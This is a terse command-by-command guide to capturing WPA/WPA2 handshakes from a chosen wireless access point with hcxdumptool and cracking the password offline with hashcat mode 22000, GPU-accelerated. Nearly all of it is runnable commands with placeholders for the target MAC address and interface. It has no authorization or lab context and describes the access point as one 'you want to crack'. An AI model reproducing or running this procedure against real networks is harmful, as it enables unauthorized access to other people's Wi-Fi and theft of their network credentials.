sudo apt-get update && sudo apt-get upgrade
sudo apt-get install hcxtools
sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service
sudo hcxdumptool --bpfc="wlan addr1 112233445566" >> attack.bpf
Replace 112233445566 with the MAC address of the target AP you want to crack.
sudo hcxdumptool --bpfc="not wlan addr3 112233445566" >> protect.bpf
Replace 112233445566 with the MAC address of the target AP you want to protect.
sudo hcxdumptool -i interface -w capture.pcapng --bpf=attack.bpf
Replace interface with the name of the wireless interface you are using.
Then, patiently wait for the network traffic to be captured as points R 1 3 P S have +
marks.
sudo systemctl start NetworkManager.service
sudo systemctl start wpa_supplicant.service
This step is unnecessary as the network manager service will be restarted automatically after system startup.
sudo hcxpcaptool -o hash.hc22000 capture.pcapng
hashcat -m 22000 hash.hc22000
check the hashcat documentation https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2#attack_examples for the specific options to use.
As hashcat can run on multi-platform, you can speed up the process by using the GPU drivers of your graphics card.